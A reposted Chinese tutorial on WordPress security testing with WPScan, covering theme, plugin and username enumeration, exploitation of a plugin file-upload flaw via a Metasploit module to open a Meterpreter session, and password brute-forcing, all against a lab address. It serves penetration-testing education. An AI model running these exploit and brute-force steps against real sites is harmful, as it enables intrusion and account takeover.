WPScan使用完整攻略:如何對WordPress站點進行安全測試

轉載自FreeBuf.COMphp

嚴正聲明:本文僅限於技術探討,嚴禁用於其餘目的。html

寫在前面的話

在這篇文章中,我將告訴你們如何使用WPScan來對WordPress站點進行安全測試。nginx

WPScan是Kali Linux默認自帶的一款漏洞掃描工具,它採用Ruby編寫,可以掃描WordPress網站中的多種安全漏洞,其中包括主題漏洞、插件漏洞和WordPress自己的漏洞。最新版本WPScan的數據庫中包含超過18000種插件漏洞和2600種主題漏洞,而且支持最新版本的WordPress。值得注意的是,它不只可以掃描相似robots.txt這樣的敏感文件,並且還可以檢測當前已啓用的插件和其餘功能。git

接下來,讓咱們進入正題…github

工具安裝與運行

Kali Linux默認自帶了WPScan,你也可使用下列命令在本身的設備中安裝WPScan:web

git clone https://github.com/wpscanteam/wpscan.git

2.png如何對Wordpress站點進行安全測試

切換到WPScan目錄中,運行下列命令查看幫助信息:數據庫

./wpscan.rb–h

3.png如何對Wordpress站點進行安全測試

你也可使用如下命令更新漏洞庫:安全

wpscan -update

掃描WordPress站點

咱們可使用–enumerate選項來掃描並發現關於目標站點主題、插件和用戶名信息。輸入下列命令開始對服務器進行掃描:ruby

./wpscan.rb –u http://192.168.0.101/wordpress/

若是你不知道目標服務器的IP地址,你能夠直接輸入URL地址。下面給出的是掃描結果:服務器

如何對Wordpress站點進行安全測試

從結果中能夠看到,服務器信息爲Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。咱們還發現,上傳目錄開啓了目錄監聽功能,所以任何人均可以經過訪問wp-content/uploads來查看目錄中的上傳內容。

主題掃描

使用下列命令對主題進行掃描:

./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t

5.png如何對Wordpress站點進行安全測試

使用下列命令掃描主題中存在的漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt

如何對Wordpress站點進行安全測試

插件掃描

插件能夠擴展WordPress站點的功能,但不少插件中都存在安全漏洞,而這也會給攻擊者提供可乘之機。

咱們可使用下列命令掃描WordPress站點中安裝的插件:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p

7.png

咱們能夠看到該網站中安裝了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3以及不少其餘的插件。

如何對Wordpress站點進行安全測試

接下來,咱們可使用下列命令來掃描目標插件中的安全漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp

如何對Wordpress站點進行安全測試

咱們能夠從掃描結果中看到這三款插件中存在的漏洞以及利用路徑:

如何對Wordpress站點進行安全測試

結合Metasploit利用插件中的漏洞

接下來,咱們將用第一個插件中的任意文件上傳漏洞來進行漏洞利用演示,該漏洞容許咱們上傳惡意文件並實現遠程代碼執行。

打開終端窗口並輸入下列命令:

useexploit/unix/webapp/wp_reflexgallery_file_upload msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101 msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/ msfexploit(wp_reflexgallery_file_upload) > exploit

你將看到終端與目標設備創建了Meterpreter會話,你能夠輸入下列命令查看目標系統信息:

Sysinfo

如何對Wordpress站點進行安全測試

枚舉WordPress用戶名

咱們能夠在終端中輸入下列命令來枚舉WordPress用戶名:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u

如何對Wordpress站點進行安全測試

接下來工具將導出用戶名數據表,你能夠看到用戶名以及對應的ID信息。

固然了,你也可使用下列命令枚舉出全部的內容:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u –e at : enumerate all themes of targeted website –e ap: enumerate all plugins of targeted website –e u: enumerate all usernames of targeted website

如何對Wordpress站點進行安全測試

使用WPScan進行暴力破解

在進行暴力破解攻擊以前,咱們須要建立對應的字典文件。輸入下列命令:

./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin

如何對Wordpress站點進行安全測試

若是找到了相匹配的用戶名與密碼,工具將直接以admin:password的形式顯示出來:

如何對Wordpress站點進行安全測試

* 參考來源:hackmydevice,FB小編Alpha_h4ck編譯,轉載自FreeBuf.COM

相關文章
相關標籤/搜索